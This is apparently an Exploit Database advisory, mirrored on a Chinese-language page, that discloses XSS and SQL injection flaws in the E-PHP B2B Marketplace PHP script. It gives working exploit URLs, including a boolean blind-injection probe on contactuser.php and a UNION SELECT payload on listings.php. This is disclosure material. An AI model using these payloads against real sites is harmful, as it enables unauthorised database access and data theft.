E-PHP B2B Marketplace – Multiple Vulnerabilities

Exploit Database
106 阅读

作者： MizoZ

日期： 2010-06-11
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/13819/

/*

Name : E-PHP B2B Marketplace Multiple Vulns
WebSite : http://www.ephpscripts.com/b2b-trading-portal.php
Price : 150 USD

Author : Hamza 'MizoZ' N.
Email : mizozx@gmail.com


*/

# XSS

- gen_confirm.php shows the error message of $_GET['errmsg'] , but it's not
protected against XSS

- Exploit : [HOST]/[PATH]/gen_confirm.php?errmsg=

# Blind SQLi

- contactuser.php suffers from a blind sqli in the get "es_id"

- Exploit : [HOST]/[PATH]/contactuser.php?es_type=3&es_id=62+and+1=(select
1)--

# SQLi

- listings.php suffers from a blind sqli in the get "mem_id"

- Exploit :
[HOST]/[PATH]/listings.php?mem_id=-207+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--

last Exploits
E-PHP B2B Marketplace – Multiple Vulnerabilities的更多信息

Joomla! 3.4.6 – Remote Code Execution (Metasploit)：
rConfig 3.9.5 – Remote Code Execution (Unauthenticated)：
Gr8 Multiple Search Engine Script 1.0 – SQL Injection：
WebMaid CMS 0.2-6 Beta – Multiple Remote File Inclusions：
Visual Tools DVR3.0.6.16, vx series 4.2.19.2 – Multiple Vulnerabilities：
Food Ordering Script 1.0 – SQL Injection：
Xavi 7968 ADSL Router – ‘/webconfig/lan/lan_config.html/local_lan_config?host_name_txtbox’ Cross-Site Scripting：
ManageEngine Support Center Plus 7903 – Multiple Vulnerabilities：